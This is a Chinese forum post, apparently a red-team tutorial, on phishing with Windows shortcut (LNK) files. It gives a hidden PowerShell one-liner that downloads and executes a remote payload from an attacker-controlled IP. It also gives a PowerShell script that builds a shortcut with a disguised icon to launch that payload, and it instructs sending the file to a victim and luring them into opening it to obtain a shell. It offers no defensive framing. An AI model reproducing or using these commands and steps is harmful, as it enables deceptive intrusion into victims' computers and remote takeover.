LNK钓鱼:隐秘的Shell入侵之术

文章前言

LNK文件是一种用于指向其他文件的特殊文件,这些文件通常也被称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用, LNK钓鱼主要将图标伪装成正常图标,但是目标会执行Shell命令

钓鱼实践

Step 1:点击Attacks—>Web Drive by—>Scripted Web Delivery,在弹出的对话框中将type类型设置为Powershell,然后单击launch生成代码

图片[1]-LNK钓鱼:隐秘的Shell入侵之术-山海云端论坛
图片[2]-LNK钓鱼:隐秘的Shell入侵之术-山海云端论坛
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.174.129:80/a'))"
图片[3]-LNK钓鱼:隐秘的Shell入侵之术-山海云端论坛

Step 2:制作一下txt文本

图片[4]-LNK钓鱼:隐秘的Shell入侵之术-山海云端论坛

Step 3:制作一下powershell

$file = Get-Content "Al1ex.txt"
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("Al1ex.lnk")
$Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21"
$Shortcut.Arguments = '
'+ $file
$Shortcut.Save()

Step 4:运行Al1ex.ps1,之后生成LNK文件

图片[5]-LNK钓鱼:隐秘的Shell入侵之术-山海云端论坛

Step 5:后将Al1ex.lnk发送给受害者,诱导用户运行

图片[6]-LNK钓鱼:隐秘的Shell入侵之术-山海云端论坛

Step 6:之后成功获得Shell

图片[7]-LNK钓鱼:隐秘的Shell入侵之术-山海云端论坛

文末小结

基于LNK文件的钓鱼方式总体而言利用难度相对有点大,一般都需要通过钓鱼邮件的方式(例如:投递压缩包并附加Link文件)进行利用,不过作为一种后渗透阶段权限维持的方式也还是挺不错的,但是就得看点击率了~

© 版权声明
THE END
喜欢就支持一下吧
点赞5 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容